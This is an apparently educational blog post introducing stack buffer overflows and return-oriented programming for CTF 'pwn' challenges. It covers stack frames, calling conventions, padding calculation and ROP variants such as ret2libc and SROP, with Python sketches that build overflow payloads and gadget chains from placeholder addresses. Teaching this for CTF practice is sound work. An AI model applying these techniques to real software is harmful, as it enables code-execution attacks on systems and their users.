A concise, challenge-oriented introduction to stack overflow.
Stack Introduction
A stack is a LIFO (last in, first out) data structure whose basic operations are push and pop.
Data-structure courses describe more complex kinds of stack with operations beyond push and pop, but none of them is the operating system's stack: the OS uses the basic one. Note that the stack grows from high addresses to low addresses.
Besides the stack, a program also keeps values in CPU registers.
The stack stores variables and function frames, so it is also called the call stack. A function frame has to hold the function's parameters and local variables in a defined order, the old ebp/rbp for restoring the previous frame, and the return address to jump back to when the current function exits.
The classic layout of a function call stack is:
The layout when some registers need to be saved on the stack is:
A stack frame can look like:
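As a rough illustration of such a frame, the sketch below simulates a 32-bit cdecl-style call on a toy stack. The `ToyStack` class, the `call_frame` helper, and every address and value are made up for this example; the point is only to show the stack pointer moving toward lower addresses and the order of arguments, return address, old ebp and locals.

```python
# Toy model of a 32-bit x86 call stack; all addresses and values are made up.
WORD = 4  # bytes per stack slot on 32-bit x86


class ToyStack:
    def __init__(self, top=0xFFFFD000):
        self.esp = top   # stack pointer: starts at a high address
        self.mem = {}    # address -> (label, value)

    def push(self, label, value):
        self.esp -= WORD  # the stack grows toward lower addresses
        self.mem[self.esp] = (label, value)
        return self.esp

    def dump(self):
        # Highest address first, like the usual stack diagrams.
        return [(addr, *self.mem[addr]) for addr in sorted(self.mem, reverse=True)]


def call_frame(stack, args, ret_addr, old_ebp, n_locals):
    """Lay out one cdecl-style frame and return the new ebp."""
    for i, arg in reversed(list(enumerate(args, start=1))):
        stack.push(f"arg{i}", arg)        # caller pushes args right to left
    stack.push("return addr", ret_addr)   # pushed by the call instruction
    ebp = stack.push("old ebp", old_ebp)  # callee: push ebp; mov ebp, esp
    for i in range(1, n_locals + 1):
        stack.push(f"local{i}", 0)        # callee: sub esp, n
    return ebp


stack = ToyStack()
ebp = call_frame(stack, args=[1, 2], ret_addr=0x08048123,
                 old_ebp=0xFFFFD040, n_locals=2)
for addr, label, value in stack.dump():
    marker = " <- ebp" if addr == ebp else ""
    print(f"{addr:#010x}  {label:<12} {value:#x}{marker}")
```

Reading the dump from top to bottom gives the arguments, the return address, the old ebp, and then the locals at the lowest addresses.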
Should the caller or the callee store the parameters/arguments?
Should they be stored from left to right, or from right to left?
Both questions are answered by the calling convention:
| Call method | Arg stack order | Arg location | Func to clean stack | Variable arg support | Func name format | Start of arg list |
|---|---|---|---|---|---|---|
| stdcall (Win32) | right to left | stack | callee | no | _name@number | “@@YG” |
| cdecl | right to left | stack | caller | yes | _name | “@@YA” |
| fastcall | right to left, arg1 in ecx, arg2 in edx | stack, registers | callee | no | @name@number | “@@YI” |
| thiscall (C++) | right to left, pointer ‘this’ in ecx | stack, registers (ecx) | callee | no | | |
| naked call | customize | customize | customize | customize | customize | customize |
Note: the table above describes 32-bit code. In 64-bit code under the System V AMD64 ABI (used on Linux), the first 6 integer or pointer arguments of the called function are passed in rdi, rsi, rdx, rcx, r8 and r9, in that order.
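To make the differences concrete, here is a minimal sketch that decides where each argument of a call would go under a few of these conventions. The function `place_args` and its convention names are hypothetical helpers for this post, and the model assumes every argument is a plain integer or pointer.

```python
# Register order for the first six integer/pointer arguments (System V AMD64).
SYSV_INT_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]


def place_args(args, convention):
    """Return (register assignments, stack push order) for a toy call.

    Simplified model: all arguments are assumed to be integer-sized.
    """
    if convention in ("cdecl", "stdcall"):
        regs, on_stack = {}, list(args)           # everything on the stack
    elif convention == "fastcall":
        regs = dict(zip(["ecx", "edx"], args))    # arg1 in ecx, arg2 in edx
        on_stack = list(args[2:])
    elif convention == "sysv64":
        regs = dict(zip(SYSV_INT_REGS, args))     # first six in registers
        on_stack = list(args[6:])
    else:
        raise ValueError(f"unknown convention: {convention}")
    return regs, on_stack[::-1]                   # pushed right to left


for conv in ("cdecl", "fastcall", "sysv64"):
    regs, pushes = place_args([1, 2, 3, 4, 5, 6, 7, 8], conv)
    print(conv, regs, "push order:", pushes)
```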
Stack Overflow
A stack buffer overflow happens when a program writes more bytes to a stack variable than the variable can hold, overwriting the data stored next to it.
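In 32-bit code, suppose we can overflow a variable s that sits offset bytes below the saved ebp. From high to low addresses, the stack holds the return address, the saved ebp, and then s.
We write offset*'a' + 'bbbb' + target_addr: the 'a' bytes fill s up to the saved ebp, 'bbbb' overwrites the saved ebp, and target_addr overwrites the return address.
So when the function returns, it jumps to the code at target_addr.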
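The payload described above can be sketched with only the standard library. The helper name `build_payload`, the offset 0x14 and the target address are assumptions chosen for illustration; real values come from the binary you are attacking.

```python
import struct


def build_payload(offset, target_addr):
    """offset*'a' + 'bbbb' + target_addr for a 32-bit little-endian target."""
    padding = b"a" * offset                 # fills s up to the saved ebp
    fake_ebp = b"bbbb"                      # overwrites the saved ebp
    ret = struct.pack("<I", target_addr)    # overwrites the return address
    return padding + fake_ebp + ret


# Hypothetical values: s at ebp-0x14, target function at 0x0804843B.
payload = build_payload(offset=0x14, target_addr=0x0804843B)
print(len(payload), payload)
```

The address is packed little-endian because x86 stores the least significant byte at the lowest address.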
Vulnerable functions include:
- Input
  - gets: reads a line, ignores \x00
  - scanf
  - vscanf
- Output
  - sprintf
- String
  - strcpy: string copy, stops at \x00
  - strcat: string concatenation, stops at \x00
  - bcopy
Determine the padding length:
- Index relative to ebp: check directly
- Index relative to esp: needs debugging
- Direct address index: the address is given
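The three cases above reduce to the same arithmetic once ebp is known. The sketch below computes the distance from the buffer to the saved ebp in each case; the function names and sample register values are hypothetical, and for the esp-relative and direct-address cases the esp/ebp values are assumed to have been read in a debugger.

```python
WORD = 4  # saved ebp and return address are 4 bytes each on 32-bit x86


def offset_from_ebp(ebp_offset):
    """Buffer at [ebp - ebp_offset]: the offset can be read off directly."""
    return ebp_offset


def offset_from_esp(esp_offset, esp, ebp):
    """Buffer at [esp + esp_offset]: needs esp and ebp from a debugger."""
    return ebp - (esp + esp_offset)


def offset_from_addr(buf_addr, ebp):
    """Buffer at an absolute address: needs ebp from a debugger."""
    return ebp - buf_addr


# Made-up debugger readings for the same hypothetical buffer.
esp, ebp = 0xFFFFCF80, 0xFFFFCFB0
print(hex(offset_from_ebp(0x14)))
print(hex(offset_from_esp(0x1C, esp, ebp)))
print(hex(offset_from_addr(0xFFFFCF9C, ebp)))
# Bytes to write before the return address: offset plus the saved ebp.
print(hex(offset_from_ebp(0x14) + WORD))
```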
To exploit the overflow we have some choices:
- overwrite the return address
- overwrite some variable on the stack
- overwrite some variable in bss
- overwrite some special address
ROP
ROP (Return-Oriented Programming) builds on stack overflow: it chains useful code gadgets already present in the program to control the execution flow.
Gadgets look like:
- pop rdi ; ret
- add ecx, ecx ; ret
- mov ebx, dword ptr [esp] ; ret
Each gadget ends with a ret, which pops the next address off the stack, so the gadgets execute one after another.
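As a minimal sketch of how gadgets are chained, the code below lays out a 64-bit chain that uses a pop rdi ; ret gadget to load the first argument and then returns into a function. All three addresses and the helper names are hypothetical placeholders; in practice they come from the target binary.

```python
import struct


def p64(value):
    """Pack a 64-bit little-endian address."""
    return struct.pack("<Q", value)


# Hypothetical addresses, for illustration only.
POP_RDI_RET = 0x400683   # gadget: pop rdi ; ret
ARG_ADDR = 0x601060      # address of a string to pass as the first argument
FUNC_ADDR = 0x400520     # function to call with rdi = ARG_ADDR


def build_chain(offset):
    chain = b"a" * offset      # fill the buffer up to the saved rbp
    chain += b"b" * 8          # overwrite the saved rbp
    chain += p64(POP_RDI_RET)  # return address: first gadget
    chain += p64(ARG_ADDR)     # popped into rdi by the gadget
    chain += p64(FUNC_ADDR)    # the gadget's ret lands here
    return chain


chain = build_chain(offset=0x20)
print(chain.hex())
```

When the vulnerable function returns, ret jumps to the gadget, pop rdi consumes the next 8 bytes, and the gadget's own ret transfers control to the function.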
There are many types of ROP:
- Basic
  - ret2text: return to code in .text
  - ret2shellcode: return to execute your input shellcode
  - ret2syscall: return to execute a system call such as execve
  - ret2libc: return to execute a function in libc (need to leak the base address)
- Intermediate
- Advanced
  - ret2_dl_runtime_resolve: exploit _dl_runtime_resolve(link_map_obj, reloc_index) (dynamic linking)
  - SROP: Sigreturn Oriented Programming (paper and slide); sigreturn is a syscall used by the signal mechanism of UNIX-like systems
  - ret2VDSO: Virtual Dynamically-linked Shared Object; some kernel-mode calls are mapped into user mode to run faster
    - Intel CPU: sysenter, sysexit
    - AMD CPU: syscall, sysret
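For ret2libc, leaking the base address comes down to one subtraction: the runtime address of a known symbol minus that symbol's offset inside libc. The sketch below shows the arithmetic; the offsets table and the leaked address are placeholder values that are not claimed to match any particular libc build, and the helper names are hypothetical.

```python
# Placeholder symbol offsets; real ones must be read from the target's libc.
OFFSETS = {"puts": 0x6F690, "system": 0x45390}


def libc_base(leaked_addr, symbol):
    """Base address = leaked runtime address - symbol offset in libc."""
    base = leaked_addr - OFFSETS[symbol]
    if base & 0xFFF:
        # Shared libraries are mapped page-aligned; a misaligned base
        # usually means the wrong libc version or a bad leak.
        raise ValueError(f"suspicious libc base {base:#x}")
    return base


def resolve(base, symbol):
    """Runtime address of another symbol once the base is known."""
    return base + OFFSETS[symbol]


leaked_puts = 0x7FFFF7A7C690  # made-up leak of puts' runtime address
base = libc_base(leaked_puts, "puts")
print(hex(base), hex(resolve(base, "system")))
```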
Related challenge collections of mine (ADWorld series):
ADWorld PWN Exercise Area Write-ups (ROP Part)
ADWorld PWN Challenge Area Write-ups (ret2text Part)
ADWorld PWN Challenge Area Write-ups (ret2libc Part)
ADWorld PWN Challenge Area Write-ups (Advanced ROP)
There are also JOP (Jump-Oriented Programming) and COP (Call-Oriented Programming), which control program flow in a similar way.